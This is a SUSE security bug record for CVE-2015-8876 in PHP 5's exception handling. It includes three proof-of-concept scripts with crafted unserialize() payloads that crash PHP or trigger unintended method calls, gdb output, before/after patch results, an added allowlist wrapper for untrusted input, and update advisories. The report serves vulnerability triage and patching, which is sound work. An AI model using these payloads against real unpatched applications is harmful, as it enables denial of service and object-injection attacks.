Bug 981049 - (CVE-2015-8876) VUL-0: CVE-2015-8876: php5, php53: Zend/zend_exceptions.c does not validate certain Exception objects
Status: RESOLVED FIXED
Classification: Novell Products
Product: SUSE Security Incidents
Component: Incidents
Version: unspecified
Hardware: Other, Other
Importance: P3 - Medium, Normal
Assigned To: Security Team bot
https://smash.suse.de/issue/169325/
CVSSv2:NVD:CVE-2015-8876:7.5:(AV:N/A...
Reported: 2016-05-23 08:06 UTC by Alexander Bergmann
Modified: 2016-08-10 07:22 UTC (History)

Found By: Security Response Team
Description Alexander Bergmann 2016-05-23 08:06:04 UTC
CVE-2015-8876

Original release date: 05/21/2016
Last revised: 05/21/2016
Source: US-CERT/NIST 

Zend/zend_exceptions.c in PHP before 5.4.44, 5.5.x before 5.5.28, and 5.6.x
before 5.6.12 does not validate certain Exception objects, which allows remote
attackers to cause a denial of service (NULL pointer dereference and application
crash) or trigger unintended method execution via crafted serialized data.

References:
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-8876
https://bugs.php.net/bug.php?id=70121
Comment 1 Swamp Workflow Management 2016-05-23 22:00:37 UTC
bugbot adjusting priority
Comment 2 Petr Gajdos 2016-05-24 11:03:45 UTC
Reproduced with 13.2 and 12.

Installed packages: php5

$ cat poc1.php
<?php

/*
$ php poc1.php
unexpected
*/

class Pwn {

	function __toString() {
		die("surprise\n");
	}

}

unserialize('O:12:"DateInterval":1:{s:4:"days";O:3:"Pwn":0:{}}');

?>
$

$ cat poc2.php
<?php

/*
$ php poc2.php
surprise 1
surprise 1
surprise 1
surprise 2
*/

class Pwn {

	function __call($x,$y) {
		die("surprise 2\n");
	}

	function __get($x) {
		echo "surprise 1\n";
	}

}

unserialize('O:12:"DateInterval":1:{s:4:"days";O:9:"Exception":7:{s:10:"'."\0".'*'."\0".'message";s:1:"x";s:17:"'."\0".'Exception'."\0".'string";s:1:"A";s:7:"'."\0".'*'."\0".'code";i:0;s:7:"'."\0".'*'."\0".'file";s:1:"a";s:7:"'."\0".'*'."\0".'line";i:1337;s:16:"'."\0".'Exception'."\0".'trace";a:0:{}s:19:"'."\0".'Exception'."\0".'previous";O:3:"Pwn":0:{}}}');

?>
$

$ cat poc3.php

<?php

/*
gdb$ r poc3.php
Starting program: /usr/bin/php5 d.php

PHP Notice:  Undefined property: stdClass::$message in poc3.php on line 1
PHP Notice:  Undefined property: stdClass::$file in poc3.php on line 1
PHP Notice:  Undefined property: stdClass::$line in poc3.php on line 1

Program received signal SIGSEGV, Segmentation fault.

0x00000000006f52c8 in zim_exception___toString (ht=<optimized out>, return_value=0x7ffff7fc34d8, return_value_ptr=<optimized out>, this_ptr=0x7ffff7fc2f28, return_value_used=<optimized out>) at /build/php5-LRe0pE/php5-5.6.11+dfsg/Zend/zend_exceptions.c:673
673			if (Z_TYPE_P(trace) != IS_STRING) {
gdb$ x/i $pc
=> 0x6f52c8 <zim_exception___toString+568>:	cmp    BYTE PTR [rax+0x14],0x6
gdb$ p $rax
$1 = 0x0

*/

unserialize('O:12:"DateInterval":1:{s:4:"days";O:9:"Exception":7:{s:10:"'."\0".'*'."\0".'message";s:1:"x";s:17:"'."\0".'Exception'."\0".'string";s:1:"A";s:7:"'."\0".'*'."\0".'code";i:0;s:7:"'."\0".'*'."\0".'file";s:1:"a";s:7:"'."\0".'*'."\0".'line";i:1337;s:16:"'."\0".'Exception'."\0".'trace";a:0:{}s:19:"'."\0".'Exception'."\0".'previous";O:8:"stdClass":0:{}}}');

?>
$

BEFORE

$ php poc1.php     
surprise
$

$ php poc2.php
surprise 1
surprise 1
surprise 1
surprise 2
$

$ php poc3.php
PHP Notice:  Undefined property: stdClass::$message in /981049/poc3.php on line 22
PHP Notice:  Undefined property: stdClass::$file in /981049/poc3.php on line 22
PHP Notice:  Undefined property: stdClass::$line in /981049/poc3.php on line 22
Segmentation fault (core dumped)
$

AFTER

$ php poc1.php
surprise
$ php poc2.php
$ php poc3.php

$

You see that poc1.php still manifests the bug, but 

"First one is probably more a design issue than a flaw, by the way I'm quite positive that could be avoided or at least documented."

So I am not spending more time on this; upstream probably has not fixed it either.

11sp3 and 11 seem not to be affected:

$ php poc1.php 
PHP Notice:  Object of class Pwn could not be converted to int in /981049/poc1.php on line 16

$ php poc2.php
PHP Notice:  Object of class Exception could not be converted to int in /981049/poc2.php on line 23
$ php poc3.php
PHP Notice:  Object of class Exception could not be converted to int in /981049/poc3.php on line 22

$
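A guarded wrapper around unserialize() for untrusted input, added here as an example; it is not part of this bug report or of PHP, and the helper names (safe_unserialize, referenced_classes) are this example's own. It reuses the poc1.php payload from comment 2 plus a constructed benign payload, and assumes that on the PHP 5.x builds discussed here (which have no allowed_classes option) the pre-scan is the only guard, while on PHP 7.0+ the built-in allowed_classes option is applied as well.

```php
<?php
// Added example, not from the bug report: refuse serialized input that would
// instantiate classes outside an allowlist, so that magic methods (__toString,
// __get, __call) of attacker-chosen classes cannot run during unserialize().

function referenced_classes($data) {
    // Object tokens look like O:<len>:"<Class>":<n>:{ or C:<len>:"<Class>":<len>:{
    // and, in a real object position, are preceded only by the start of the
    // payload, ';' or '{'. A string value that merely contains such text also
    // matches, which makes the check fail closed rather than open.
    preg_match_all('/(?:^|[;{])[OC]:\d+:"([^"]*)"/', $data, $m);
    return array_values(array_unique($m[1]));
}

function safe_unserialize($data, array $allowed) {
    foreach (referenced_classes($data) as $class) {
        if (!in_array($class, $allowed, true)) {
            return array('ok' => false, 'reason' => "class '$class' not allowed");
        }
    }
    if (PHP_VERSION_ID >= 70000) {
        // PHP 7.0+: unknown classes become __PHP_Incomplete_Class objects.
        $value = unserialize($data, array('allowed_classes' => $allowed));
    } else {
        // PHP 5.x (the builds in this bug): the pre-scan above is the only guard.
        $value = unserialize($data);
    }
    return array('ok' => true, 'value' => $value);
}

// Payload from poc1.php in comment 2: a DateInterval whose "days" is an object.
$poc1 = 'O:12:"DateInterval":1:{s:4:"days";O:3:"Pwn":0:{}}';
// Constructed benign payload: an array of scalars only.
$benign = 'a:2:{s:4:"user";s:5:"alice";s:5:"count";i:3;}';

$r1 = safe_unserialize($poc1, array('DateInterval'));
var_dump($r1['ok']);      // bool(false): nested class Pwn is not allowed
$r2 = safe_unserialize($benign, array());
var_dump($r2['ok']);      // bool(true): no object tokens at all
```

Keep the allowlist strict: the poc2.php and poc3.php payloads nest an Exception, so allowing Exception would still reach the crash on an unpatched build; the allowlist mitigates exposure, the upstream patch fixes the bug.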
Comment 3 Bernhard Wiedemann 2016-05-24 13:00:35 UTC
This is an autogenerated message for OBS integration:
This bug (981049) was mentioned in
https://build.opensuse.org/request/show/397708 13.2 / php5
Comment 4 Petr Gajdos 2016-05-24 13:22:38 UTC
Packages submitted.
Comment 6 Bernhard Wiedemann 2016-06-01 12:00:59 UTC
This is an autogenerated message for OBS integration:
This bug (981049) was mentioned in
https://build.opensuse.org/request/show/399462 13.2 / php5
Comment 8 Swamp Workflow Management 2016-06-11 12:16:14 UTC
openSUSE-SU-2016:1553-1: An update that fixes 13 vulnerabilities is now available.

Category: security (important)
Bug References: 976775,980366,980373,980375,981049,981050,981061,982009,982010,982011,982012,982013,982162
CVE References: CVE-2013-7456,CVE-2015-4116,CVE-2015-8873,CVE-2015-8874,CVE-2015-8876,CVE-2015-8877,CVE-2015-8879,CVE-2016-3074,CVE-2016-5093,CVE-2016-5094,CVE-2016-5095,CVE-2016-5096,CVE-2016-5114
Sources used:
openSUSE 13.2 (src):    php5-5.6.1-66.1
Comment 9 Swamp Workflow Management 2016-06-20 14:08:53 UTC
SUSE-SU-2016:1633-1: An update that fixes 8 vulnerabilities is now available.

Category: security (moderate)
Bug References: 981049,981050,981061,982009,982010,982011,982012,982013
CVE References: CVE-2013-7456,CVE-2015-8876,CVE-2015-8877,CVE-2015-8879,CVE-2016-5093,CVE-2016-5094,CVE-2016-5095,CVE-2016-5096
Sources used:
SUSE Linux Enterprise Workstation Extension 12-SP1 (src):    imap-2007e_suse-19.1
SUSE Linux Enterprise Workstation Extension 12 (src):    imap-2007e_suse-19.1
SUSE Linux Enterprise Software Development Kit 12-SP1 (src):    imap-2007e_suse-19.1, php5-5.5.14-64.5
SUSE Linux Enterprise Software Development Kit 12 (src):    imap-2007e_suse-19.1, php5-5.5.14-64.5
SUSE Linux Enterprise Module for Web Scripting 12 (src):    imap-2007e_suse-19.1, php5-5.5.14-64.5
SUSE Linux Enterprise Desktop 12-SP1 (src):    imap-2007e_suse-19.1
SUSE Linux Enterprise Desktop 12 (src):    imap-2007e_suse-19.1
Comment 10 Swamp Workflow Management 2016-06-27 13:09:55 UTC
openSUSE-SU-2016:1688-1: An update that fixes 8 vulnerabilities is now available.

Category: security (moderate)
Bug References: 981049,981050,981061,982009,982010,982011,982012,982013
CVE References: CVE-2013-7456,CVE-2015-8876,CVE-2015-8877,CVE-2015-8879,CVE-2016-5093,CVE-2016-5094,CVE-2016-5095,CVE-2016-5096
Sources used:
openSUSE Leap 42.1 (src):    imap-2007e_suse-22.1, php5-5.5.14-53.1
Comment 11 Marcus Meissner 2016-08-01 09:53:38 UTC
released